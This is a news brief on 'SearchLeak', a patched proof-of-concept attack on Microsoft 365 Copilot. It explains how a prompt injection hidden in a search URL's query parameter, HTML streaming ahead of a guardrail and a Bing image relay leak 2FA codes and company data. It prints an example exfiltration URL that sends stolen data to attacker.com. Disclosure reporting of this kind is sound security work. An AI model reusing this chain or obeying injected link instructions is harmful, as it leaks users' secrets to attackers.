Brieftide
Subscribe
4 min read

Microsoft Copilot flaw let attackers steal 2FA codes

Researchers disclosed a proof-of-concept SearchLeak chain that used Copilot to expose 2FA codes and other M365 data via image requests.

The Brieftide

TL;DR

  • 01Researchers disclosed a proof-of-concept SearchLeak chain that used Copilot to expose 2FA codes and other M365 data via image requests.
  • 02That sequence let an <img> tag fire an HTTP request carrying extracted data to an external endpoint before Copilot's post-generation guardrail applied.
  • 03The researchers showed the attacker sends a victim an email containing a URL such as https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= with an instruction in the q field.

Microsoft patched a maximum severity vulnerability in its M365 Copilot platform last Tuesday, and on Monday the researchers who reported the bug published a proof-of-concept showing how it could retrieve two-factor authentication codes and other sensitive data from emails accessible to Copilot.

The exploit, which the researchers and security firm Varonis call SearchLeak, chains a Parameter-to-Prompt Injection with HTML rendering and a permitted Bing request to funnel secrets to an attacker-controlled server.

How did the SearchLeak exploit bypass Copilot's guardrails?

SearchLeak used a Parameter-to-Prompt Injection in a URL query to force Copilot to act on instructions hidden in a link, then relied on Copilot streaming raw HTML that the browser rendered before output was wrapped in a protective block. That sequence let an tag fire an HTTP request carrying extracted data to an external endpoint before Copilot's post-generation guardrail applied.

The researchers showed the attacker sends a victim an email containing a URL such as https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= with an instruction in the q field. Copilot begins streaming a response that includes an tag. The browser renders the and issues an HTTP request to the src URL. Only after Copilot finishes generating does the guardrail wrap output in a block, by which time the request has already left the browser.

Because Copilot restricts direct requests to untrusted sites, the exploit next used Bing as a trampoline. Per the Copilot content security policy, Bing is permitted to send such requests. The researchers showed the flow produces a request like https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png which causes Bing to forward the image URL to the attacker-controlled domain.

What specific techniques and components were involved?

The chain combined at least three elements: a Parameter-to-Prompt Injection, raw HTML streaming that briefly escapes Copilot's output-wrapping guardrail, and a permitted third-party relay in Bing to reach an attacker domain. The researchers described the Parameter-to-Prompt Injection as a close relative of prompt injection where the malicious command sits in a URL query parameter rather than in an email or other content. Varonis named the overall attack SearchLeak and warned the blast radius reaches enterprise content indexed by M365, including emails, meeting invites, notes, SharePoint documents and OneDrive files.

The researchers summed up the critical role of search in the exploit: “The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” they wrote.

Why does this weakness keep coming up?

The root cause is the fundamental inability of LLM-based assistants to reliably distinguish between user instructions and instructions embedded in third-party content they are asked to summarize or act on. Microsoft and other large language model providers have been unable to prevent their products from complying with malicious requests hidden inside content. In Copilot the vendor layered guardrails such as wrapping output in blocks and restricting outgoing requests to trusted domains, but the researchers found a timing and relay gap that let data leak before those protections applied.

Microsoft patched the specific vulnerabilities used by SearchLeak on Tuesday, but the researchers noted there is no known way to fix the underlying problem that allows models to be tricked by embedded instructions. The result is an arms race of ad hoc mitigations that attackers will attempt to bypass in new ways.

Why it matters

SearchLeak targets enterprise M365 accounts and not just personal mail. Varonis highlighted that the exploit can surface anything the user has access to inside the organization, expanding the blast radius to SharePoint, OneDrive and other indexed business content. The attack demonstrates how a single click by a user can trigger an automated assistant to perform actions that exfiltrate sensitive data without explicit user input beyond opening a URL.

What to watch

Watch for additional proof-of-concept variants that replace Bing or the image relay step with other permitted services, and for vendor changes to streaming and rendering behavior that aim to eliminate the window between HTML rendering and guardrail application. The researchers and Varonis are the named parties who disclosed and described SearchLeak; Microsoft issued a patch for the specific flaws on Tuesday.

SearchLeak exploit data flow
sends email with malicious search URLvictim clicks link; Copilot processes querystreams raw HTML including <img>browser issues image request to allowed Bing URLBing forwards image URL to attacker domainAttackercrafts URL with malicious q parameterVictim Emailcontains link to m365.cloud.microsoft/search/?...&q=M365 Copilotstreams raw HTML responseVictim Browserrenders <img> and issues HTTP requestBingpermitted relay per content security policyAttacker Serverreceives forwarded request with stolen data
Advertisement

Written by The Brieftide · Source: Ars Technica

The Brieftide Daily · 06:00

Briefs like this one, in your inbox every morning.

 

FreeOne email a dayEvery claim sourcedUnsubscribe in one click
Advertisement